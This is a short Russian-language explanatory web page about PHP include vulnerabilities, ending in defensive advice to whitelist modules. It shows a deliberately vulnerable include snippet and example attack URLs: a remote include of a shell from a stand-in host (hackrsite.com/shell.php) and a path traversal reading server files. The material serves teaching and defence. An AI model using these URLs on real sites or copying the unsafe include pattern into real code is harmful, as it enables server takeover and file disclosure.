Include - уязвимости

Данная уязвимость появляется в плохо спроектированных веб-
приложениях, где поступающие от пользователя при запросе к
ресурсам данные некорректно используются на сервере для под-
ключения модулей-обработчиков. В случае уязвимого приложения
файл с вредоносным кодом, закачанный на сервер пользователем
посредством функций самого веб-приложения либо с использова-
нием каталогов с общим доступом на Shared-хостинге, может быть
выполнен на сервере.
Например,на вашем сайте есть URL
/index.php?page=main.html, а в index.php запросы обрабатывает
такой код:
$page = $_GET[’page’];
include($page);

Очевидно, любой пользователь может зайти на страницу вида
/index.php?page=http://hackrsite.com/shell.php и выполнить произ-
вольный код на вашем веб-сервере, если на нем разрешены уда-
ленные include
.

В ином случае можно посмотреть содержимое
любого файла и скрипта на сервере, перейдя по ссылке вида
/index.php?page=../../mysecretfile.txt.

Для исключения Include-уязвимостей веб-приложения следует
включать файлы кода, проверяя их принадлежность к исходному
веб-приложению,
для чего обычно составляется список активных
модулей.
Следует также использовать фреймворки создания веб-
приложений, обеспечивающие модульность и защиту от данного ро-
да уязвимостей.

Категория: 
The code has been tested and works

Add new comment

Filtered HTML

  • Web page addresses and e-mail addresses turn into links automatically.
  • Allowed HTML tags: <a> <em> <strong> <cite> <blockquote> <code> <ul> <ol> <li> <dl> <dt> <dd>
  • Lines and paragraphs break automatically.

Plain text

  • No HTML tags allowed.
  • Web page addresses and e-mail addresses turn into links automatically.
  • Lines and paragraphs break automatically.